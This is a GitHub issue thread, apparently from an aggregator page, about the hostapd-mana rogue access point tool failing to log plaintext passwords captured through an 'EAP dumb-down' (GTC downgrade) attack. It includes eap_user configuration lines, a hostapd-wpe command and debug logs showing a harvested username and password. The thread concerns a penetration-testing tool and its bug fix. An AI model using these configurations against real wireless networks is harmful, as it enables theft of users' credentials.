Comments (7)
singe
commented on July 20, 2024
I think you may have just found the bug I've been chasing but unable to replicate. Will take a look thanks.
…Sent from my phone
On 02 May 2017, at 2:18 PM, Lexus89 ***@***.***> wrote:
When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?
hostapd.eap_user:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]
Hostapd log:
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
from hostapd-mana.
dhd0004
commented on July 20, 2024
Hi,
Did you find how to make EAP dumb-down attack works in hostapd-mana? Y see that the android device just try to use MSCHAPv2 instead of GTC, even when it does not have 2phase authentication method selected.
WIth freeradius-wpe I can make this attack works, but not with hostpad-mana.
Regards
from hostapd-mana.
Lexus89
commented on July 20, 2024
I believe it was by changing the order of methods in the hostapd.eap_user file..
from hostapd-mana.
dhd0004
commented on July 20, 2024
Hi,
Thanks for the reply, do you have an example file I can see?
I am not hable to make this attack works..
Maybe is using this line of configuration?:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]
Regards
from hostapd-mana.
singe
commented on July 20, 2024
I log PAP plaintext, not GTC. Will add it. Thanks.
from hostapd-mana.
W00t3k
commented on July 20, 2024
https://twitter.com/W00Tock/status/1019251419310972930
Edit file "hostapd-wpe.eap_user" (You can replace PEAP with FAST)
PEAP [ver=1]
"t" GTC "password" [2]
./hostapd-wpe hostapd-wpe.conf -ddddd
-snip- EAP-GTC: Response password: -snip-
By configuring the eap)user file, you can request from Apple and Android devices a GTC clear text password - which is shown in the debug console, but is currently not logged.
Thanks Singe, thought this might help you find that bug...
from hostapd-mana.
singe
commented on July 20, 2024
Thanks everyone. I now log GTC, you can see the code at https://github.com/sensepost/hostapd-mana/blob/master/src/eap_server/eap_server.c#L2136
from hostapd-mana.
Related Issues (20)
- Feature request - PEAP/MSCHAPv2 MITM (relaying) HOT 2
- error when using 'make -C hostapd-mana' HOT 2
- Stuck in 'obtaining ip address' when trying to connect to the AP HOT 1
- libssl.so.1.0.0 Not Found HOT 4
- Multiple BSS with Hostapd HOT 3
- [WPA-EAP] client cannot join EAPOL TX: Message too long HOT 1
- client connected but hash not captured HOT 2
- is this possible !!!!!!!!!!!!!!!!?????
- no_probe_resp_if_max_sta = 0 not working
- Feature request: Logging EAP Identity
- ACL Bug: MAC Address Bitmasks Ignored After VLAN ID
- ACL Bug: Bitmasks Break Binary Search
- Segmentation fault using with sycophant HOT 11
- Berate_ap gets stuck on internet sharing method nat. No ap created, kali nethunter
- WPA/2 Pre-shared Key (PSK) Networks HOT 1
- Python 3 support?
- Error Handling Directed Probes HOT 1
- ld returned 1 exit status HOT 3
- . HOT 2
- .
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hostapd-mana.